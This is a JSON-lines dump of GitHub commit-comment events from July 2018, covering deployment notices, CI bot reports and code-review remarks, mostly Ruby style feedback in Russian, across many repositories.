{"id":"8031795968","type":"CommitCommentEvent","actor":{"login":"gladdenmac"},"repo":{"name":"gladdenmac/ikonnect2018"},"payload":{"comment":{"id":29867011,"position":null,"line":null,"path":null,"commit_id":"5acfd8bb38e8a2e4b628b114d51f1b654bfb8c4b","created_at":"2018-07-28T06:48:46Z","updated_at":"2018-07-28T06:48:46Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/640d7b8e-7eff-4a5f-a2fe-7bc745ce981f?env_id=ibm%3Ayp%3Aus-south \"iKonnect-gladden\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/6958b593-fec2-4358-8a8b-088f2a581ddf?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-gladden\") deployed [ikonnect2018](https://github.com/gladdenmac/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-064846 \"deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-064846\") to [dev](https://console.bluemix.net/apps/241a3d46-8c77-4701-95a8-a2d3726bb410?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:macalig@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:48:46Z"}
{"id":"8031796551","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/assimulo-feedstock"},"payload":{"comment":{"id":29867016,"position":null,"line":null,"path":null,"commit_id":"061279b2bf7d2de7e2a06a3d42497c7d485c84fe","created_at":"2018-07-28T06:49:21Z","updated_at":"2018-07-28T06:49:21Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @chria was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T06:49:21Z"}
{"id":"8031796639","type":"CommitCommentEvent","actor":{"login":"jamesthurman64"},"repo":{"name":"jamesthurman64/messages"},"payload":{"comment":{"id":29867017,"position":null,"line":null,"path":null,"commit_id":"1aafc3378e9af0b5ccf0b9f2f07dbe1c35513ab9","created_at":"2018-07-28T06:49:28Z","updated_at":"2018-07-28T06:49:28Z","author_association":"OWNER","body":"\r\n[Markdown_1.0.1.zip] (https://github.com/jamesthurman64/messages/files/2237736/Markdown_1.0.1.zip)\r\n"}},"created_at":"2018-07-28T06:49:28Z"}
{"id":"8031797610","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29867022,"position":null,"line":null,"path":null,"commit_id":"3ec78468453dc4433f4684d59594f780420cfa8a","created_at":"2018-07-28T06:50:23Z","updated_at":"2018-07-28T06:50:23Z","author_association":"NONE","body":"Congratulations too!"}},"created_at":"2018-07-28T06:50:23Z"}
{"id":"8031798237","type":"CommitCommentEvent","actor":{"login":"schliffen"},"repo":{"name":"schliffen/Hand_written_digit_recognition"},"payload":{"comment":{"id":29867023,"position":null,"line":null,"path":null,"commit_id":"d4644116938a598b8c0c4f66aae92970a42974e0","created_at":"2018-07-28T06:51:00Z","updated_at":"2018-07-28T06:51:00Z","author_association":"OWNER","body":"Codes are written in matlab.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-28T06:51:00Z"}
{"id":"8031800077","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29867024,"position":5,"line":5,"path":"part3/6-shopping_cart.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:52:45Z","updated_at":"2018-07-28T06:52:45Z","author_association":"NONE","body":"про инициализацию хеша см. выше"}},"created_at":"2018-07-28T06:52:45Z"}
{"id":"8031800324","type":"CommitCommentEvent","actor":{"login":"gladdenmac"},"repo":{"name":"gladdenmac/ikonnect2018"},"payload":{"comment":{"id":29867025,"position":null,"line":null,"path":null,"commit_id":"d6110d1e560714377a59397a736150ff72d790f6","created_at":"2018-07-28T06:52:58Z","updated_at":"2018-07-28T06:52:58Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/640d7b8e-7eff-4a5f-a2fe-7bc745ce981f?env_id=ibm%3Ayp%3Aus-south \"iKonnect-gladden\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/6958b593-fec2-4358-8a8b-088f2a581ddf?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-gladden\") deployed [ikonnect2018](https://github.com/gladdenmac/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-065257 \"deploy-ibm-yp-au-syd-macalig-ph.ibm.com-dev-20180728-065257\") to [dev](https://console.bluemix.net/apps/241a3d46-8c77-4701-95a8-a2d3726bb410?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:macalig@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:52:58Z"}
{"id":"8031800572","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29867030,"position":6,"line":6,"path":"part3/6-shopping_cart.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:53:12Z","updated_at":"2018-07-28T06:53:12Z","author_association":"NONE","body":"это лучше куда-то в район 23 строки"}},"created_at":"2018-07-28T06:53:12Z"}
{"id":"8031801192","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29867031,"position":null,"line":null,"path":null,"commit_id":"7b685614a6f29ddc74b220a77efa0a902c38d3b6","created_at":"2018-07-28T06:53:47Z","updated_at":"2018-07-28T06:53:47Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2951 of 2951 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-28T06:53:47Z"}
{"id":"8031801923","type":"CommitCommentEvent","actor":{"login":"krasi-georgiev"},"repo":{"name":"prometheus/prombench"},"payload":{"comment":{"id":29867036,"position":13,"line":433,"path":"provider/gke/gke.go","commit_id":"c8939530d410830a3a14da7dc1923d1530023117","created_at":"2018-07-28T06:54:30Z","updated_at":"2018-07-28T06:54:30Z","author_association":"MEMBER","body":"when you use {{ .RELEASE }} doesn't touch the value.\r\nonly when you use {{ normalise .RELEASE }} it will normalise"}},"created_at":"2018-07-28T06:54:30Z"}
{"id":"8031802239","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29867037,"position":19,"line":19,"path":"part3/6-shopping_cart.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:54:49Z","updated_at":"2018-07-28T06:54:49Z","author_association":"NONE","body":"в руби принято при написании хешей оставлять пробел после и перед фигурными скобками, вот так хорошо:\r\n```ruby\r\ngood_hash = { a: 1, b: 2 }\r\n```\r\nа вот так плохо:\r\n```ruby\r\nbad_hash = {a: 1, b: 2}\r\n```"}},"created_at":"2018-07-28T06:54:49Z"}
{"id":"8031803097","type":"CommitCommentEvent","actor":{"login":"acorreyes"},"repo":{"name":"acorreyes/ikonnect2018"},"payload":{"comment":{"id":29867039,"position":null,"line":null,"path":null,"commit_id":"5586c2a1726095c783bcad43af3da58e7a06a040","created_at":"2018-07-28T06:55:39Z","updated_at":"2018-07-28T06:55:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/9ff88ff5-cb1d-4e9f-a742-35736c6b6454?env_id=ibm%3Ayp%3Aus-south \"iKonnect-acorreyes\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/0ba9d4e5-a428-40d1-8790-39ba113c499f?env_id=ibm%3Ayp%3Aus-south \"iKonnect2018-acorreyes\") deployed [ikonnect2018](https://github.com/acorreyes/ikonnect2018/releases/tag/deploy-ibm-yp-au-syd-9reyesmm-ph.ibm.com-dev-20180728-065539 \"deploy-ibm-yp-au-syd-9reyesmm-ph.ibm.com-dev-20180728-065539\") to [dev](https://console.bluemix.net/apps/de986a5e-a636-4e82-9984-94fc6eeb7cdc?env_id=ibm:yp:au-syd \"ibm:yp:au-syd:9reyesmm@ph.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-28T06:55:39Z"}
{"id":"8031803626","type":"CommitCommentEvent","actor":{"login":"W1zzardTPU"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29867040,"position":null,"line":null,"path":null,"commit_id":"026fd4ecf0b48f7988b4d50eb400981a2cef64b0","created_at":"2018-07-28T06:56:08Z","updated_at":"2018-07-28T06:56:08Z","author_association":"NONE","body":"Causes missing images in download section https://www.techpowerup.com/download/techpowerup-gpu-z/"}},"created_at":"2018-07-28T06:56:08Z"}
{"id":"8031804560","type":"CommitCommentEvent","actor":{"login":"sipian"},"repo":{"name":"prometheus/prombench"},"payload":{"comment":{"id":29867047,"position":null,"line":null,"path":null,"commit_id":"c8939530d410830a3a14da7dc1923d1530023117","created_at":"2018-07-28T06:56:59Z","updated_at":"2018-07-28T06:56:59Z","author_association":"CONTRIBUTOR","body":"That's awesome 🎉🎉 !"}},"created_at":"2018-07-28T06:56:59Z"}
{"id":"8031804648","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29867048,"position":19,"line":19,"path":"part3/6-shopping_cart.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:57:04Z","updated_at":"2018-07-28T06:57:04Z","author_association":"NONE","body":"лучше вложенный хеш разбить на 2 значения, с ключами  :price и :quantity к примеру, то есть не использовать вводимые юзером значения как ключи\r\n\r\nвариант:\r\n```ruby\r\n  cart[item_name] = { price: price, amount: amount }\r\n```"}},"created_at":"2018-07-28T06:57:04Z"}
{"id":"8031805343","type":"CommitCommentEvent","actor":{"login":"Begasus"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29867052,"position":null,"line":null,"path":null,"commit_id":"b52dff5267a144de293c9c06f7b0102ee22258b4","created_at":"2018-07-28T06:57:45Z","updated_at":"2018-07-28T06:57:45Z","author_association":"CONTRIBUTOR","body":"hmm, looks like I forgot to bump the revision number here, could that be it?"}},"created_at":"2018-07-28T06:57:45Z"}
{"id":"8031806092","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29867053,"position":19,"line":19,"path":"part3/6-shopping_cart.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T06:58:30Z","updated_at":"2018-07-28T06:58:30Z","author_association":"NONE","body":"хеши нужны  и используются в основном из-за того, что это \"именованные коллекции\", т.е. если мы имеем  хеш знаем ключи, мы по ключам всегда из него получаем значение...\r\nесли же написать хеш так: `{ price => amount }`, то по сути в каждом новом хеше будет свой ключ.. равный введенному пользователем значению `price`\r\nзачем тогда использовать хеш?\r\nключ все равно неизвестен, обратиться за информацией по нему не можем\r\nв общем, если хранить информацию в хеше, то лучше ее хранить под ключами\r\n\r\nэто облегчает чтение кода\r\nесли я вижу такую строку\r\n```ruby\r\ncart[item_name][price]\r\n```\r\nя уже догадываюсь, что за значение я получу"}},"created_at":"2018-07-28T06:58:30Z"}
{"id":"8031807856","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyvcf-feedstock"},"payload":{"comment":{"id":29867062,"position":null,"line":null,"path":null,"commit_id":"9c6836f790959c78574470d98f1cf4d434447298","created_at":"2018-07-28T07:00:06Z","updated_at":"2018-07-28T07:00:06Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @pertuyf, @kyleabeauchamp were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @pvanheus, @acaprez, @corburn were added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-28T07:00:06Z"}
{"id":"8031808283","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29867074,"position":25,"line":25,"path":"part3/6-shopping_cart.rb","commit_id":"24f6dbd00ea2aec337999a18d0fbf2bb8d30fefc","created_at":"2018-07-28T07:00:18Z","updated_at":"2018-07-28T07:00:18Z","author_association":"NONE","body":"если переписать хеш согласно рекомендации выше, то вложенного цикла не понадобится\r\nкод будет проще и понятней"}},"created_at":"2018-07-28T07:00:18Z"}
{"id":"8031808555","type":"CommitCommentEvent","actor":{"login":"zohre123"},"repo":{"name":"zohre123/clinical-data-classification."},"payload":{"comment":{"id":29867076,"position":14,"line":11,"path":"README.md","commit_id":"2449fa45c002870de2627ca5482426723d3c288a","created_at":"2018-07-28T07:00:29Z","updated_at":"2018-07-28T07:00:29Z","author_association":"OWNER","body":"2449fa45c002870de2627ca5482426723d3c288a"}},"created_at":"2018-07-28T07:00:29Z"}
{"id":"8031808857","type":"CommitCommentEvent","actor":{"login":"IamRaviTejaG"},"repo":{"name":"p-society/p-society.github.io"},"payload":{"comment":{"id":29867077,"position":null,"line":null,"path":null,"commit_id":"a761cbaf493922ccce46575f6d9020b61475c1d4","created_at":"2018-07-28T07:00:42Z","updated_at":"2018-07-28T07:00:42Z","author_association":"CONTRIBUTOR","body":"@knrt10 Wrote your heart out! Nice man! 👍 👍 👍 👍 "}},"created_at":"2018-07-28T07:00:42Z"}
{"id":"8031810137","type":"CommitCommentEvent","actor":{"login":"sipian"},"repo":{"name":"prometheus/prombench"},"payload":{"comment":{"id":29867091,"position":null,"line":null,"path":null,"commit_id":"c8939530d410830a3a14da7dc1923d1530023117","created_at":"2018-07-28T07:01:50Z","updated_at":"2018-07-28T07:01:50Z","author_association":"CONTRIBUTOR","body":"The word `normalize` seems a bit vague.\r\nMaybe we can change it to `replacePeriod` or something to clearly tell it's utility"}},"created_at":"2018-07-28T07:01:50Z"}
{"id":"8031811368","type":"CommitCommentEvent","actor":{"login":"sol"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":29867097,"position":12,"line":89,"path":"Cabal/Distribution/Simple/Program/Builtin.hs","commit_id":"435fd96e264503d05656a470f49a5dd16d00b920","created_at":"2018-07-28T07:02:57Z","updated_at":"2018-07-28T07:02:57Z","author_association":"MEMBER","body":"But then again, this may not be specific to your change.  Here is how the list of build-in build tools got extended in the past:\r\n\r\n1.14.0:\r\nhpc\r\n\r\n1.22.4:\r\nghcjs\r\nghcjs-pkg\r\nhaskell-suite\r\nhaskell-suite-pkg\r\n\r\n2.0.0:\r\nrunghc\r\ndoctest\r\n\r\nI'm not convinced yet that this always was on purpose and I wouldn't be surprised if this were side effects of other changes.\r\n\r\nAs I understand it, since `2.0` arbitrary build tools are accepted anyway, where the observable difference between a built-in build tool and an unknown build tool is:\r\n\r\n- The version specified for an unknown build tool is silently ignored\r\n- Cabal does not error out if an unknown build tool is not on the `PATH`\r\n\r\n@ezyang @peti this last change I'm mentioning, was this primarily motivated by nix, so that nix can install system tools without the need of a custom setup script?"}},"created_at":"2018-07-28T07:02:57Z"}
{"id":"8031812475","type":"CommitCommentEvent","actor":{"login":"metaphorizer"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29867100,"position":11,"line":6,"path":"course_1/part_3/vowels.rb","commit_id":"f60c09999c104fc781e846c8a9ac7fb63ec11266","created_at":"2018-07-28T07:03:54Z","updated_at":"2018-07-28T07:03:54Z","author_association":"OWNER","body":"\"порядковый номер буквы в алфавите (a - 1).\"\r\n\r\nа что имелось в виду конструкцией (а - 1)? я так и понял, что, если у буквы порядковый номер 7, то в значение хэше должно быть (7 - 1) = 6, потому и использовал индексы.\r\n\r\nпоправил, сейчас а: 1 и т.д."}},"created_at":"2018-07-28T07:03:54Z"}
{"id":"8031812605","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29867101,"position":null,"line":null,"path":null,"commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T07:04:01Z","updated_at":"2018-07-28T07:04:01Z","author_association":"MEMBER","body":"@alexlamsl: unless you enable 2FA for npm auth/push, you can't publish."}},"created_at":"2018-07-28T07:04:01Z"}
{"id":"8031813148","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29867102,"position":10,"line":15,"path":"lesson8/validation.rb","commit_id":"a67dfb92f2cc9b9d444a8b5013def92ae1bc1d80","created_at":"2018-07-28T07:04:27Z","updated_at":"2018-07-28T07:04:27Z","author_association":"NONE","body":"так лучше, только добавь пробелы после и перед фигурными скобками"}},"created_at":"2018-07-28T07:04:27Z"}
{"id":"8031813561","type":"CommitCommentEvent","actor":{"login":"krasi-georgiev"},"repo":{"name":"prometheus/prombench"},"payload":{"comment":{"id":29867104,"position":null,"line":null,"path":null,"commit_id":"c8939530d410830a3a14da7dc1923d1530023117","created_at":"2018-07-28T07:04:48Z","updated_at":"2018-07-28T07:04:48Z","author_association":"MEMBER","body":"I was thinking we might add more replacments later."}},"created_at":"2018-07-28T07:04:48Z"}
{"id":"8031813831","type":"CommitCommentEvent","actor":{"login":"XhmikosR"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29867105,"position":4,"line":449,"path":"Gruntfile.js","commit_id":"f6f834bb6edcd1340a01053c91042b0bdcde4b97","created_at":"2018-07-28T07:05:02Z","updated_at":"2018-07-28T07:05:02Z","author_association":"MEMBER","body":"Would be nice if you made PRs so that one can review before making such changes."}},"created_at":"2018-07-28T07:05:02Z"}
{"id":"8031815237","type":"CommitCommentEvent","actor":{"login":"Maayu2415"},"repo":{"name":"MetaMask/metamask-extension"},"payload":{"comment":{"id":29867107,"position":null,"line":null,"path":null,"commit_id":"e45fa27bcfb6ccfa340469d4154610a96c5c93c2","created_at":"2018-07-28T07:06:16Z","updated_at":"2018-07-28T07:06:16Z","author_association":"NONE","body":"Help me"}},"created_at":"2018-07-28T07:06:16Z"}
{"id":"8031817039","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"AShalysh/ruby_tasks"},"payload":{"comment":{"id":29867116,"position":33,"line":23,"path":"lesson8/validation.rb","commit_id":"a67dfb92f2cc9b9d444a8b5013def92ae1bc1d80","created_at":"2018-07-28T07:07:55Z","updated_at":"2018-07-28T07:07:55Z","author_association":"NONE","body":"ох сложновато ) лушче бы наверное было по переменым все растащить.. ну ладно ))"}},"created_at":"2018-07-28T07:07:55Z"}
{"id":"8031817266","type":"CommitCommentEvent","actor":{"login":"socialskyo"},"repo":{"name":"rhymix/rhymix"},"payload":{"comment":{"id":29867117,"position":null,"line":null,"path":null,"commit_id":"d069cf1194deaf126353b67434233ec807373fb9","created_at":"2018-07-28T07:08:07Z","updated_at":"2018-07-28T07:08:07Z","author_association":"NONE","body":"![2018-07-28 4 06 33](https://user-images.githubusercontent.com/6075830/43354079-485fc590-9280-11e8-83fa-34bcca52855a.png)\r\n\r\n기진곰님 저는 왜 증상이 계속 있을까요? 이렇게 amp라는 문구 떄문에 403에러가 나오면서\r\n 파일 첨부가 4개이상 한번에 안됩니다.\r\n즉 5개를 파일 첨부하면 4개까지 되고, 이어서 또 넣어줘야 됩니다.\r\n\r\n"}},"created_at":"2018-07-28T07:08:07Z"}
{"id":"8031818687","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29867120,"position":null,"line":null,"path":null,"commit_id":"7b685614a6f29ddc74b220a77efa0a902c38d3b6","created_at":"2018-07-28T07:09:21Z","updated_at":"2018-07-28T07:09:21Z","author_association":"NONE","body":"158691015_Issue#6792 (Nigusse) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1701 of 1701 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7b685614a6f29ddc74b220a77efa0a902c38d3b6-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.08%25-green.png)</a>\n"}},"created_at":"2018-07-28T07:09:21Z"}
{"id":"8031820253","type":"CommitCommentEvent","actor":{"login":"alexmozzhakov"},"repo":{"name":"An0nUD4Y/SocialFish"},"payload":{"comment":{"id":29867121,"position":48,"line":331,"path":"SocialFish.py","commit_id":"f53c2c260db5ac61172dbcd6d9b24efad46a3c3a","created_at":"2018-07-28T07:10:46Z","updated_at":"2018-07-28T07:10:46Z","author_association":"COLLABORATOR","body":"this should kill all ssh connections, btw "}},"created_at":"2018-07-28T07:10:46Z"}
{"id":"8031821932","type":"CommitCommentEvent","actor":{"login":"hanwenbo"},"repo":{"name":"yansongda/pay"},"payload":{"comment":{"id":29867131,"position":null,"line":null,"path":null,"commit_id":"89bf5eddef48e016c0237f127602a56481c6fc30","created_at":"2018-07-28T07:12:18Z","updated_at":"2018-07-28T07:12:18Z","author_association":"NONE","body":"为了解决兼容swoole、easyswoole的rawContent"}},"created_at":"2018-07-28T07:12:18Z"}
{"id":"8031822101","type":"CommitCommentEvent","actor":{"login":"usama7628674"},"repo":{"name":"An0nUD4Y/SocialFish"},"payload":{"comment":{"id":29867133,"position":48,"line":331,"path":"SocialFish.py","commit_id":"f53c2c260db5ac61172dbcd6d9b24efad46a3c3a","created_at":"2018-07-28T07:12:27Z","updated_at":"2018-07-28T07:12:27Z","author_association":"COLLABORATOR","body":"Thats fine."}},"created_at":"2018-07-28T07:12:27Z"}
{"id":"8031823119","type":"CommitCommentEvent","actor":{"login":"alexmozzhakov"},"repo":{"name":"An0nUD4Y/SocialFish"},"payload":{"comment":{"id":29867137,"position":48,"line":331,"path":"SocialFish.py","commit_id":"f53c2c260db5ac61172dbcd6d9b24efad46a3c3a","created_at":"2018-07-28T07:13:26Z","updated_at":"2018-07-28T07:13:26Z","author_association":"COLLABORATOR","body":"*processes containing ssh in their name (via `-f` flag)"}},"created_at":"2018-07-28T07:13:26Z"}
{"id":"8031825076","type":"CommitCommentEvent","actor":{"login":"tanvirnabil"},"repo":{"name":"tanvirnabil/product-tracker"},"payload":{"comment":{"id":29867148,"position":26,"line":26,"path":"developers/nabil/hello-world/app/src/main/res/layout/activity_main.xml","commit_id":"0d9e7795bcd8ae4c776c8e00015bcb9e7a158ed7","created_at":"2018-07-28T07:15:03Z","updated_at":"2018-07-28T07:15:03Z","author_association":"OWNER","body":"My first android app hello-world layout"}},"created_at":"2018-07-28T07:15:03Z"}
{"id":"8031825777","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867152,"position":4,"line":4,"path":"Lesson_2/array_step_five.rb","commit_id":"778e707663805183b24b54e2cae640134f5ccd9b","created_at":"2018-07-28T07:15:34Z","updated_at":"2018-07-28T07:15:34Z","author_association":"NONE","body":"блоки, заключенные в фигурные скобки также, как хеши выделяются пробелами в начале и в конце:\r\n```ruby\r\ncollection.each { |element| do_smth(element) } # good\r\n\r\ncollection.each {|element| do_smth(element)} # bad\r\n```"}},"created_at":"2018-07-28T07:15:34Z"}
{"id":"8031826633","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29867154,"position":5,"line":30,"path":"pkgs/development/coq-modules/category-theory/default.nix","commit_id":"08bf0b7630afa8656bb36bd61fac8ce9b2aff613","created_at":"2018-07-28T07:16:15Z","updated_at":"2018-07-28T07:16:15Z","author_association":"MEMBER","body":"@jwiegley, this issue breaks the evaluation test for everyone who's submitting a PR. I'll revert the commit to fix the bot. Please just  commit a fixed version."}},"created_at":"2018-07-28T07:16:15Z"}
{"id":"8031826676","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867155,"position":4,"line":4,"path":"Lesson_2/array_step_five.rb","commit_id":"778e707663805183b24b54e2cae640134f5ccd9b","created_at":"2018-07-28T07:16:17Z","updated_at":"2018-07-28T07:16:17Z","author_association":"NONE","body":"и после вызова метода `step(5)` тоже желательно добавить пробел"}},"created_at":"2018-07-28T07:16:17Z"}
{"id":"8031827249","type":"CommitCommentEvent","actor":{"login":"zmcoo9"},"repo":{"name":"zmcoo9/test"},"payload":{"comment":{"id":29867156,"position":null,"line":null,"path":null,"commit_id":"3daec093d56b9cc659b6e9085b29bde278ba9288","created_at":"2018-07-28T07:16:48Z","updated_at":"2018-07-28T07:16:48Z","author_association":"OWNER","body":"asdffdsasdffdsfsdafdasf"}},"created_at":"2018-07-28T07:16:48Z"}
{"id":"8031827662","type":"CommitCommentEvent","actor":{"login":"zohre123"},"repo":{"name":"zohre123/clinical-data-classification."},"payload":{"comment":{"id":29867157,"position":null,"line":null,"path":null,"commit_id":"fe371d81f5249e16f124729778f095d7bc00d9ff","created_at":"2018-07-28T07:17:10Z","updated_at":"2018-07-28T07:17:10Z","author_association":"OWNER","body":"code "}},"created_at":"2018-07-28T07:17:10Z"}
{"id":"8031828100","type":"CommitCommentEvent","actor":{"login":"ProPercivalalb"},"repo":{"name":"ProPercivalalb/DoggyTalents"},"payload":{"comment":{"id":29867159,"position":null,"line":null,"path":null,"commit_id":"376dafcbdf748b760e9113925111a2b139953e11","created_at":"2018-07-28T07:17:33Z","updated_at":"2018-07-28T07:17:33Z","author_association":"OWNER","body":"Fixed https://github.com/ProPercivalalb/DoggyTalents/commit/376dafcbdf748b760e9113925111a2b139953e11"}},"created_at":"2018-07-28T07:17:33Z"}
{"id":"8031828629","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29867160,"position":5,"line":5,"path":"Lesson_2/array_step_five.rb","commit_id":"778e707663805183b24b54e2cae640134f5ccd9b","created_at":"2018-07-28T07:18:03Z","updated_at":"2018-07-28T07:18:03Z","author_association":"NONE","body":"сложновато конечно, можно было просто `puts array` или `p array`\r\n\r\n```\r\n$ irb\r\n2.5.1 :001 > arr = [1, 2, 3]\r\n => [1, 2, 3] \r\n2.5.1 :002 > puts arr\r\n1\r\n2\r\n3\r\n => nil \r\n2.5.1 :003 > p arr\r\n[1, 2, 3]\r\n => [1, 2, 3] \r\n2.5.1 :004 > \r\n```"}},"created_at":"2018-07-28T07:18:03Z"}
{"id":"8031829121","type":"CommitCommentEvent","actor":{"login":"rashmigs1993"},"repo":{"name":"intuit/wasabi"},"payload":{"comment":{"id":29867165,"position":null,"line":null,"path":null,"commit_id":"6cba19e11a371eb44c38c447a3b78e6732ba2a4e","created_at":"2018-07-28T07:18:33Z","updated_at":"2018-07-28T07:18:33Z","author_association":"CONTRIBUTOR","body":"@kevcampb This has been resolved. "}},"created_at":"2018-07-28T07:18:33Z"}
{"id":"8031830003","type":"CommitCommentEvent","actor":{"login":"tong15549445025"},"repo":{"name":"tong15549445025/matplotlib"},"payload":{"comment":{"id":29867173,"position":null,"line":null,"path":null,"commit_id":"74d11a2489f8eddd4b50516b87b2cb291a891bc1","created_at":"2018-07-28T07:19:26Z","updated_at":"2018-07-28T07:19:26Z","author_association":"OWNER","body":"绘制等高线"}},"created_at":"2018-07-28T07:19:26Z"}
